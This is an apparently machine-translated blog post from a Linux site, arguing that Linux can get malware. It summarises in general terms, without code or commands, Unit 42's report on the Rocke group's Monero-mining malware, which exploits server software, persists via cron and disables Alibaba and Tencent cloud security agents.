Cryptocurrency mining malware can affect linux


It is common to hear the following statement: “Linux has no virus”And this is far from reality. It is true that systems based on Linux, have a very high level of security, and for simple tasks, such as installing an application, administrator permission is required.

But he is not immune to failures, much less invulnerable, as the saying goes.

Linux vs. Virus

Even though it is not so simple to be infected on Linux, such threats do exist, and new cases occur every day. Sometimes fanciful claims, other times true.

If you would like to really understand “because Linux doesn’t catch viruses”, We have detailed content on the subject.

Security researchers at Unit 42, warn of new malware for Linux. A leader in cybersecurity, “Palo Alto Networks”, recently discovered malware achieves through vulnerabilities in the Apache Struts 2, Oracle WebLogic and Adobe ColdFusion, inject a malicious script called “a7”, This script does the persistence using cronjobs, a software utility that automatically schedules and performs tasks in the operating system.

The mining malware

After infecting the server, the malware removes software responsible for system security. It hides its malicious process, kills any other processes that use rules in iptables, and that also mine cryptocurrencies.

With the whole stage ready, he starts to mine the coin “Monero”, Which resembles Bitcoins.

Responsible for the “Rocke” cracker group, the software appears to be looking specifically for 5 security protection and monitoring products in the cloud.

Interestingly, all of the vulnerable security solutions are from Chinese companies:

  • Alibaba Threat Detection Service agent (AI-based detection engine);
  • Alibaba CloudMonitor agent (RAM consumption monitor, CPU, network connectivity);
  • Alibaba Cloud Assistant agent (Software that manages instances automatically);
  • Tencent Host Security agent (AI-based detection engine);
  • Tencent Cloud Monitor agent (Monitor and network connectivity manager);

Malware trend

The team of researchers at Palo Alto Networks has already contacted companies that offer such solutions. Now it is up to Alibaba and Tencent to resolve such vulnerabilities.

Seen as a possible trend among cybercriminals, researchers who have discovered such malware believe that this model will be increasingly used by crackers.

Like most cases of viruses in Linux, the problem is caused by some vulnerability in other software and not in the way of managing the system. With security updates, these possibilities are reduced and with the correction of vulnerabilities, these problems are soon remedied.

And did you know that Linux also catches viruses? Or I believed not. Don’t forget to access the post link that we explained all about “Linux does not catch viruses”.

I wait for you in the next post, SISTEMATICALLY, here on the blog Diolinux. ?